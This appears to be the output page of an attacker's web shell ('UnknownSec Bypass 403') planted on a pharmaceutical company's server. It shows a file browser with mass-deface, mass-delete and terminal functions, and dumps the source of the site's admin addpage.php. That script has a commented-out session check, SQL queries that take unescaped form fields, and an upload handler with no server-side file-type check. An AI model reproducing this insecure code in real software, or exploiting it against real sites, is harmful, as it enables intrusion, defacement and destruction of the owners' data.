UnknownSec Bypass
403
:
/
home
/
growthpharma
/
www
/
Master@Growth
/ [
drwxr-xr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
addpage.php
<?php include_once("config.php"); //include_once("session_check.php"); include_once("fckeditor/fckeditor.php"); function getExtension($str) { $i = strrpos($str,"."); if (!$i) { return ""; } $l = strlen($str) - $i; $ext = substr($str,$i+1,$l); return $ext; } if(isset($_POST['mode']) && ($_POST['mode']=="addrecord")) { $details = trim(mysql_real_escape_string($_POST['details'])); $details2 = trim(mysql_real_escape_string($_POST['details2'])); $content = trim(mysql_real_escape_string($_POST['content'])); $img1_name=trim($_FILES['proimage']['name']); $extension = getExtension($img1_name); $extension = strtolower($extension); $exten1=$extension; if($img1_name!="") { $id=date("ymdHis"); $image1 = $id."_"."proimage".".".$exten1; $imagetmp1 = $_FILES['proimage']['tmp_name']; $size = getimagesize($imagetmp1); $image_name_path1 = "page/$image1"; move_uploaded_file($imagetmp1, $image_name_path1); } else { $image1 = "picicon.jpg"; } $menuid = $_POST['groupid']; $submenuid = stripslashes($_POST['catid']); $title = trim($_POST['title']); $status = $_POST['status']; $date=date("Y-m-d"); //echo "insert into product set catid='$catid',groupid='$groupid',whatsnew='$whatsnew',prodtitle='$prodtitle',prodimage='$image1',limage='$image11',status='$status',date='$date'"; die; //echo "insert into product set title='$title',oldprice='$oldprice',newprice='$newprice',catid='$catid',groupid='$groupid',whatsnew='$whatsnew',prodtitle='$prodtitle',prodimage='$image1',limage='$image11',status='$status',details='$details',date='$date'"; $product = mysql_query("insert into page set title='$title',details2='$details2',submenu='$submenuid',menu='$menuid',image='$image1',status='$status',details='$details',shortcontent='$content',date='$date'"); if($product) { header("location:addpage.php"); $_SESSION['mode'] = "Record Reserved Successfully."; exit; } else { header("location:addpage.php"); $_SESSION['mode1'] = "Some Error Occured!"; exit; }} ?> <!doctype html> <!-- paulirish.com/2008/conditional-stylesheets-vs-css-hacks-answer-neither/ --> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en"> <!--<![endif]--> <head> <meta charset="utf-8"> <!-- DNS prefetch --> <link rel=dns-prefetch href="//fonts.googleapis.com"> <!-- Use the .htaccess and remove these lines to avoid edge case issues. More info: h5bp.com/b/378 --> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <title> Page Control :: Growth Pharmaceuticals Pvt. Ltd. </title> <meta name="description" content=""> <meta name="author" content=""> <!-- Mobile viewport optimized: j.mp/bplateviewport --> <meta name="viewport" content="width=device-width,initial-scale=1"> <!-- Place favicon.ico and apple-touch-icon.png in the root directory: mathiasbynens.be/notes/touch-icons --> <!-- CSS: implied media=all --> <!-- CSS concatenated and minified via ant build script--> <link rel="stylesheet" href="css/style.css"> <!-- Generic style (Boilerplate) --> <link rel="stylesheet" href="css/960.fluid.css"> <!-- 960.gs Grid System --> <link rel="stylesheet" href="css/main.css"> <!-- Complete Layout and main styles --> <link rel="stylesheet" href="css/buttons.css"> <!-- Buttons, optional --> <link rel="stylesheet" href="css/lists.css"> <!-- Lists, optional --> <link rel="stylesheet" href="css/icons.css"> <!-- Icons, optional --> <link rel="stylesheet" href="css/notifications.css"> <!-- Notifications, optional --> <link rel="stylesheet" href="css/typography.css"> <!-- Typography --> <link rel="stylesheet" href="css/forms.css"> <!-- Forms, optional --> <link rel="stylesheet" href="css/tables.css"> <!-- Tables, optional --> <link rel="stylesheet" href="css/charts.css"> <!-- Charts, optional --> <link rel="stylesheet" href="css/jquery-ui-1.8.15.custom.css"> <!-- jQuery UI, optional --> <!-- end CSS--> <!-- Fonts --> <link href="//fonts.googleapis.com/css?family=PT+Sans" rel="stylesheet" type="text/css"> <!-- end Fonts--> <!-- More ideas for your <head> here: h5bp.com/d/head-Tips --> <!-- All JavaScript at the bottom, except for Modernizr / Respond. Modernizr enables HTML5 elements & feature detects; Respond is a polyfill for min/max-width CSS3 Media Queries For optimal performance, use a custom Modernizr build: www.modernizr.com/download/ --> <script src="js/libs/modernizr-2.0.6.min.js"></script> <script> function formReset() { document.getElementById("frmreg").reset(); } </script> <SCRIPT type="text/javascript"> function chkvalue12() { var status=0; if(document.getElementById("groupid").value=="") { document.getElementById("groupid_error").style.display="block"; document.getElementById("groupid_error").innerHTML="This field is required."; status=1; } if(document.getElementById("groupid").value!="") { document.getElementById("groupid_error").style.display="none"; document.getElementById("groupid_error").innerHTML=""; } if(document.getElementById("title").value=="") { document.getElementById("title_error").style.display="block"; document.getElementById("title_error").innerHTML="This field is required."; status=1; } if(document.getElementById("title").value!="") { document.getElementById("title_error").style.display="none"; document.getElementById("title_error").innerHTML=""; } if(status==1) { return false; } } function CheckExtension(fld) { //if(document.getElementById("proimage").value=="") //{ //document.getElementById("pri_error").style.display="block"; //document.getElementById("pri_error").innerHTML="This field is required."; //status=1; //} //if(document.getElementById("proimage").value!="") //{ //document.getElementById("pri_error").style.display="none"; //document.getElementById("pri_error").innerHTML=""; //} var valid_extensions = /(.jpg|.gif|.png)$/i; if (valid_extensions.test(fld.value)) return true; alert('You can Only Upload .jpg,.gif,.png format !!'); document.getElementById("resumediv").innerHTML=""; document.getElementById("resumediv").innerHTML="<input type='file' name='proimage' id='proimage' onChange='return CheckExtension(this)'/>"; fld.select(); fld.value=""; fld.focus(); return false; } function CheckExtension1(fld1) { var valid_extensions = /(.jpg|.gif|.png)$/i; if (valid_extensions.test(fld1.value)) return true; alert('You can Only Upload .jpg,.gif,.png format !!'); document.getElementById("resumediv1").innerHTML=""; document.getElementById("resumediv1").innerHTML="<input type='file' name='proimage1' id='proimage1' onChange='return CheckExtension1(this)'/>"; fld.select(); fld.value=""; fld.focus(); return false; } </SCRIPT> <script type="text/javascript" src="unique.js"></script> <script type="text/javascript" src="localitycheck.js"></script> </head> <body id="top"> <!-- Begin of #container --> <div id="container"> <!-- Begin of #header --> <?php include_once("header.php");?> <!--! end of #header --> <div class="fix-shadow-bottom-height"></div> <!-- Begin of Sidebar --> <?php include_once("navigation.php");?> <!--! end of #sidebar --> <!-- Begin of #main --> <div id="main" ROLE="main"> <!-- Begin of titlebar/breadcrumbs --> <div id="title-bar"> <ul id="breadcrumbs"> <li><a href="dashboard.php" title="Home"><span id="bc-home"></span></a></li> <li class="no-hover">Admin Control</li> </ul> </div> <!--! end of #title-bar --> <div class="shadow-bottom shadow-titlebar"></div> <!-- Begin of #main-content --> <div id="main-content"> <div class="container_12"> <div class="grid_12"> <h1>Create Webpage</h1> <p></p> </div> <div class="grid_12"> <div class="block-border"> <div class="block-header"> <h1>Enter Details</h1><span></span> </div> <form id="frmreg" name="frmreg" class="block-content form" action="" method="post" enctype="multipart/form-data" onSubmit="return chkvalue12();"> <input type="hidden" name="mode" id="mode" value="addrecord" /> <?php if(isset($_SESSION['mode']) && ($_SESSION['mode']!='')) { ?> <div class="alert success"> <span class="hide">x</span> <?php echo $_SESSION['mode']; unset ($_SESSION['mode']); ?> </div> <?php } ?> <?php if(isset($_SESSION['mode1']) && ($_SESSION['mode1']!='')) { ?> <div class="alert error"> <span class="hide">x</span> <?php echo $_SESSION['mode1']; unset ($_SESSION['mode1']); ?> </div> <?php } ?> <?php if(isset($_SESSION['notDone']) && ($_SESSION['notDone']!='')) { ?> <div class="alert error"> <span class="hide">x</span> <?php echo $_SESSION['notDone']; unset ($_SESSION['notDone']); ?> </div> <?php } ?> <!--select * from submenu where status='Active' and menuid='".$group['menuid']."' and submenutitle!='EXCLUSIVE BUTTON' order by orderby desc--> <div class="_50"> <p> <label for="select">Menu Type </label> <select name="groupid" id="groupid" onChange="selectcatlogue(frmreg);"> <option value="">Select Menu First </option> <?php $sql = mysql_query("select * from menu where status='Active' and menutitle!='Home' order by orderby ASC"); $sqf = mysql_fetch_array($sql); while($sqf) { ?> <option value="<?php echo $sqf['menuid'];?>"><?php echo $sqf['menutitle'];?></option> <?php $sqf = mysql_fetch_array($sql); } ?> </select> <br> <span style="font-family:Arial; font-size:11px; font-weight:bold; color:#993300;" id="groupid_error"></span> </p> </div> <div class="_25"> <p> <label for="role">Sub Menu</label> <select name="catid" id="catid" > <option >Select Sub Menu</option> </select> </p> <br> </div> <?php /*?><div class="_100"> <p> <label for="select">Product Catelouge </label> <select name="catid" id="catid" > <option value="">Select Product Catelouge First </option> <?php $sql = mysql_query("select * from prodcat where status='Active' order by orderby"); $sqf = mysql_fetch_array($sql); while($sqf) { ?> <option value="<?php echo $sqf['catid'];?>"><?php echo $sqf['cattitle'];?></option> <?php $sqf = mysql_fetch_array($sql); } ?> </select> <br> <span style="font-family:Arial; font-size:11px; font-weight:bold; color:#993300;" id="ctitle_error"></span> </p> </div><?php */?> <div class="_50"> <p> <label for="role">Page Title </label> <input type="text" name="title" id="title" /> <span style="font-family:Arial; font-size:11px; font-weight:bold; color:#993300;" id="title_error"></span> </p> </div> <div class="_100"> <p> <label for="role">Short content </label> <textarea name="content" id="content"> </textarea> <span style="font-family:Arial; font-size:11px; font-weight:bold; color:#993300;" id="content_error"></span> </p> </div> <div class="_50"> <p> <label for="Banner">Image</label> <span align="left" id="resumediv"> <input type="file" name="proimage" id="proimage" onChange="return CheckExtension(this)"/> </span> <span style="font-family:Arial; font-size:11px; font-weight:bold; color:#993300;" id="pri_error"></span> </p> </div> <!--<div class="_100"> <p><label for="Banner">Product Image</label> <span class="_100" id="resumediv"> <input type="file" name="proimage" id="proimage" onChange="return CheckExtension(this)"/> </span> <span style="font-family:Arial; font-size:11px; font-weight:bold; color:#993300;" id="pri_error"></span> </p> </div>--> <!--<div class="_50"> <p> <span class="label">What's New Status</span> <label><input type="radio" name="whatsnew" value="Yes" checked/> Yes</label> <label><input type="radio" name="whatsnew" value="No" /> No</label> <label><input type="radio" name="radio" /> Justo duo</label> </p> </div>--> <div class="_100"> <p><label for="Details">Page Content</label> <?php $oFCKeditor = new FCKeditor('details') ; $oFCKeditor->BasePath = 'fckeditor/' ; $oFCKeditor->Value = "" ; $oFCKeditor->Create() ; $oFCKeditor->toolbarSet = 'Mytoolbar'; ?> <span style="font-family:Arial; font-size:11px; font-weight:bold; color:#993300;" id="details_error"></span> </p> </div> <!-- <div class="_100"> <p><label for="Details">Page Content</label> <?php $oFCKeditor = new FCKeditor('details2') ; $oFCKeditor->BasePath = 'fckeditor/' ; $oFCKeditor->Value = "" ; $oFCKeditor->Create() ; $oFCKeditor->toolbarSet = 'Mytoolbar'; ?> <span style="font-family:Arial; font-size:11px; font-weight:bold; color:#993300;" id="details_error"></span> </p> </div> --> <div class="_50"> <p> <span class="label">Status</span> <label><input type="radio" name="status" value="Active" checked/> Active</label> <label><input type="radio" name="status" value="Blocked" /> Blocked</label> <!--<label><input type="radio" name="radio" /> Justo duo</label>--> </p> </div> <div class="clear"></div> <div class="block-actions"> <ul class="actions-left"> <li><a class="button red" onClick="formReset();">Reset</a></li> </ul> <ul class="actions-right"> <li><input type="submit" class="button" value="Proceed"></li> <li><a class="button red" id="reset-validate-form" onClick="javascript:window.location.href='managewpage.php'">Manage web Page</a></li> </ul> </div> </form> </div> </div> <div class="clear"></div> <div class="clear height-fix"></div> </div></div> <!--! end of #main-content --> </div> <!--! end of #main --> <!--<footer id="footer"><div class="container_12"> <div class="grid_12"> <div class="footer-icon align-center"><a class="top" href="#top"></a></div> </div> </div></footer>--> </div> <!--! end of #container --> <!-- JavaScript at the bottom for fast page loading --> <!-- Grab Google CDN's jQuery, with a protocol relative URL; fall back to local if offline --> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js"></script> <script>window.jQuery || document.write('<script src="js/libs/jquery-1.6.2.min.js"><\/script>')</script> <!-- scripts concatenated and minified via ant build script--> <script defer src="js/plugins.js"></script> <!-- lightweight wrapper for consolelog, optional --> <script defer src="js/mylibs/jquery-ui-1.8.15.custom.min.js"></script> <!-- jQuery UI --> <script defer src="js/mylibs/jquery.notifications.js"></script> <!-- Notifications --> <script defer src="js/mylibs/jquery.uniform.min.js"></script> <!-- Uniform (Look & Feel from forms) --> <script defer src="js/mylibs/jquery.validate.min.js"></script> <!-- Validation from forms --> <script defer src="js/mylibs/jquery.dataTables.min.js"></script> <!-- Tables --> <script defer src="js/mylibs/jquery.tipsy.js"></script> <!-- Tooltips --> <script defer src="js/mylibs/excanvas.js"></script> <!-- Charts --> <script defer src="js/mylibs/jquery.visualize.js"></script> <!-- Charts --> <script defer src="js/mylibs/jquery.slidernav.min.js"></script> <!-- Contact List --> <script defer src="js/common.js"></script> <!-- Generic functions --> <script defer src="js/script.js"></script> <!-- Generic scripts --> <script type="text/javascript"> $().ready(function() { /* * Form Validation */ $.validator.setDefaults({ submitHandler: function(e) { $.jGrowl("Form was successfully submitted.", { theme: 'success' }); $(e).parent().parent().fadeOut(); v.resetForm(); v2.resetForm(); v3.resetForm(); } }); var v = $("#create-user-form").validate(); jQuery("#reset").click(function() { v.resetForm(); $.jGrowl("User was not created!", { theme: 'error' }); }); var v2 = $("#write-message-form").validate(); jQuery("#reset2").click(function() { v2.resetForm(); $.jGrowl("Message was not sent.", { theme: 'error' }); }); var v3 = $("#create-folder-form").validate(); jQuery("#reset3").click(function() { v3.resetForm(); $.jGrowl("Folder was not created!", { theme: 'error' }); }); var validateform = $("#validate-form").validate(); $("#reset-validate-form").click(function() { validateform.resetForm(); $.jGrowl("You resetted the form.", { theme: 'error' }); }); /* * Datepicker */ $( "#datepicker" ).datepicker(); }); </script> <!-- end scripts--> <!-- Prompt IE 6 users to install Chrome Frame. Remove this if you want to support IE 6. chromium.org/developers/how-tos/chrome-frame-getting-started --> <!--[if lt IE 7 ]> <script src="//ajax.googleapis.com/ajax/libs/chrome-frame/1.0.3/CFInstall.min.js"></script> <script>window.attachEvent('onload',function(){CFInstall.check({mode:'overlay'})})</script> <![endif]--> </body> </html>
Copyright © 2024 - UnknownSec